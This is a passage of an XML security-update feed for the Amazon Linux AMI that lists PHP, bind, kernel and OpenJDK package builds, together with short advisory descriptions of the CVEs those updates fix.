arch="x86_64"><filename>Packages/php56-opcache-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" 
version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.31" release="1.111.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-embedded-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.17-1.120.amzn1.x86_64.rpm</filename></package><package 
name="php55" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.31" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.31" release="1.111.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-odbc-5.5.31-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.31" 
release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-gmp" 
version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.31-1.111.amzn1.i686.rpm</filename></package><package 
name="php56-dbg" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.17" release="1.120.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-pspell-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.17" release="1.120.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.17-1.120.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.31-1.111.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.31" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.31-1.111.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-641</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-641: medium priority package update for bind</title><issued date="2016-01-19 12:00:00" /><updated date="2016-01-19 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8704:
Embargoed
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704" title="" id="CVE-2015-8704" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.43.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.43.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-642</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-642: medium priority package update for kernel</title><issued date="2016-01-19 17:07:00" /><updated date="2016-01-19 19:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0728:
1297475:
CVE-2016-0728 kernel: Possible use-after-free vulnerability in keyring facility
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0728" title="" id="CVE-2016-0728" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.13" release="19.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.1.13-19.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="19.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.13-19.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.13" release="19.31.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.1.13-19.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-643</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-643: important priority package update for java-1.7.0-openjdk</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0494:
An integer signedness issue was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2016-0483:
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly, execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2016-0466:
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory.
CVE-2016-0448:
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2016-0402:
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
CVE-2015-4871:
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4871" title="" id="CVE-2015-4871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0402" title="" id="CVE-2016-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0448" title="" id="CVE-2016-0448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0466" title="" id="CVE-2016-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0483" title="" id="CVE-2016-0483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0494" title="" id="CVE-2016-0494" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:0053.html" title="" id="RHSA-2016:0053" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.65.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.95" 
